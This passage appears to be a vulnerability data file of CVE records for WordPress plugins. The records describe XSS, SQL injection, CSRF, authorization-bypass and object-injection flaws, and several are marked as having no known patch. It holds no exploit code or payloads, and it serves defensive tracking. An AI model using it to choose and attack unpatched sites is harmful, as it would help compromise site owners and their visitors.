{"CVE_ID":"CVE-2024-11841","slug":"wp-tithely","versionImpact":"1.1","description":"The Tithe.ly Giving Button WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e344c722-c9b3-4527-a50d-50cdf07ebace\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e344c722-c9b3-4527-a50d-50cdf07ebace\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31547","slug":"uptime-robot-monitor","versionImpact":"2.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aphotrax Uptime Robot Plugin for WordPress allows SQL Injection. This issue affects Uptime Robot Plugin for WordPress: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0277","slug":"wc-fields-factory","versionImpact":"4.1.5","description":"The WC Fields Factory WordPress plugin through 4.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wc-fields-factory_1-4-5\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wc-fields-factory_1-4-5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ffb2f1-b291-49bf-80a8-08d03ceca53b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ffb2f1-b291-49bf-80a8-08d03ceca53b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4362","slug":"kiwi-social-share","description":"The Kiwi Social Share plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the kiwi_social_share_get_option() function called via the kiwi_social_share_get_option AJAX action in version 2.1.0. This makes it possible for unauthenticated attackers to read and modify arbitrary options on a WordPress site that can be used for complete site takeover. This was a previously fixed vulnerability that was reintroduced in this version.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8148b6d0-190a-4b97-8af7-edd6943116d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8148b6d0-190a-4b97-8af7-edd6943116d1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kiwi-social-sharing-plugin-fixed-critical-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kiwi-social-sharing-plugin-fixed-critical-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwi-social-share\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwi-social-share\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4400","slug":"better-search","versionImpact":"2.5.2","description":"The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the bsearch_process_settings_import() and bsearch_process_settings_export() functions. This makes it possible for unauthenticated attackers to import and export settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473344%40better-search&new=2473344%40better-search&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473344%40better-search&new=2473344%40better-search&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7acbcf74-2bae-412b-bf9d-70287a91deea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7acbcf74-2bae-412b-bf9d-70287a91deea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4023","slug":"all-users-messenger","versionImpact":"1.24","description":"The All Users Messenger WordPress plugin through 1.24 does not prevent non-administrator users from deleting messages from the all-users messenger.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/682c0226-28bd-4051-830d-8b679626213d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/682c0226-28bd-4051-830d-8b679626213d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1169","slug":"buddyforms","versionImpact":"2.8.7","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media upload due to a missing capability check on the buddyforms_upload_handle_dropped_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to upload media files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1466\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php#L1466\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046092\\\/buddyforms\\\/trunk\\\/includes\\\/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5757","slug":"header-footer-elementor","versionImpact":"1.6.35","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url  attribute within the plugin's Site Title widget in all versions up to, and including, 1.6.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5ab022c-c16c-488b-b004-a7351f8fa3d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5ab022c-c16c-488b-b004-a7351f8fa3d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.35\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.35\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101672\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101672\\\/#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8481","slug":"wp-special-textboxes","versionImpact":"6.2.2","description":"The Special Text Boxes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 6.2.2. This is due to the plugin adding the filter add_filter('comment_text', 'do_shortcode'); which will run all shortcodes in comments. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b2a08f-2122-4eaf-ab46-1945cf6a68ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b2a08f-2122-4eaf-ab46-1945cf6a68ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-special-textboxes\\\/trunk\\\/stb-class.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-special-textboxes\\\/trunk\\\/stb-class.php#L36\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9670","slug":"2d-tag-cloud-widget-by-sujin","versionImpact":"6.0.2","description":"The 2D Tag Cloud plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 6.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2d-tag-cloud-widget-by-sujin\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2d-tag-cloud-widget-by-sujin\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/2d-tag-cloud-widget-by-sujin\\\/trunk\\\/views\\\/admin-tabs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/2d-tag-cloud-widget-by-sujin\\\/trunk\\\/views\\\/admin-tabs.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9708","slug":"easy-svg-upload","versionImpact":"1.0","description":"The Easy SVG Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a9ade1-fca7-48c1-bb87-75fc3528e234?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a9ade1-fca7-48c1-bb87-75fc3528e234?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg-upload\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg-upload\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54207","slug":"wp-auctions","versionImpact":"3.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows Stored XSS.This issue affects WordPress Auction Plugin: from n\/a through 3.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7504","slug":"friends","description":"The Friends plugin for WordPress is vulnerable to PHP Object Injection in version 3.5.1 via deserialization of untrusted input of the query_vars parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. This requires access to the site's SALT_NONCE and SALT_KEY to exploit.","refs":"[{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1K-_AcDk9BhUa0kSQ_M-UUnLgmnYJTA0l\\\/view\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1K-_AcDk9BhUa0kSQ_M-UUnLgmnYJTA0l\\\/view\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/537\",\"name\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306684%40friends&new=3306684%40friends&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306684%40friends&new=3306684%40friends&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf91d75e-cef4-4154-aa16-6ca96db9c5bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf91d75e-cef4-4154-aa16-6ca96db9c5bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0586","slug":"all-in-one-seo-pack","versionImpact":"4.2.9","description":"The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Contributor+ role to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Admin\\\/PostSettings.php?v=2829340#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Admin\\\/PostSettings.php?v=2829340#L202\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c13f00e-3048-44cf-8979-2b0b0c508f3a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c13f00e-3048-44cf-8979-2b0b0c508f3a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4361","slug":"wp-jobsearch","versionImpact":"1.8.1","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the jobsearch_job_integrations_settin_save AJAX action in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers to update arbitrary options on the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839a0cc0-a656-4107-a748-4ad85e950237?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839a0cc0-a656-4107-a748-4ad85e950237?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a69aa52f-9876-4180-97a4-713459b43f24\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a69aa52f-9876-4180-97a4-713459b43f24\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9656","slug":"mynx-page-builder","versionImpact":"0.27.8","description":"The Mynx Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.27.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73a25208-81fe-4337-a344-1c129bd80862?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73a25208-81fe-4337-a344-1c129bd80862?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mynx-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mynx-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10544","slug":"woo-manage-fraud-orders","versionImpact":"2.6.1","description":"The Woo Manage Fraud Orders plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.1.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information about users contained in the exposed log files.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a62df5f6-64b0-4489-9dde-0d472040ee12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a62df5f6-64b0-4489-9dde-0d472040ee12?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/class-wmfo-debug-log.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/class-wmfo-debug-log.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51615","slug":"wp-auctions","versionImpact":"3.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows SQL Injection.This issue affects WordPress Auction Plugin: from n\/a through 3.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12735","slug":"advance-post-prefix","versionImpact":"1.1.1","description":"The Advance Post Prefix WordPress plugin through 1.1.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins and above to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b355399-e92b-46aa-ada1-95e99fc03976\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b355399-e92b-46aa-ada1-95e99fc03976\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0585","slug":"all-in-one-seo-pack","versionImpact":"4.2.9","description":"The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Administrator role or above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L666\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L665\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L665\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L624\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L624\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L625\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_ema
il=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db97180-9308-4891-9de9-acefe31d088f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db97180-9308-4891-9de9-acefe31d088f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2120","slug":"wp-responsive-thumbnail-slider","versionImpact":"1.1.9","description":"The Thumbnail carousel slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4bf4e12-5cbb-45bc-938e-62163baaa15d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4bf4e12-5cbb-45bc-938e-62163baaa15d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2813150%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.9&new=2899786%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2813150%40wp-responsive-thumbnail-slider%2F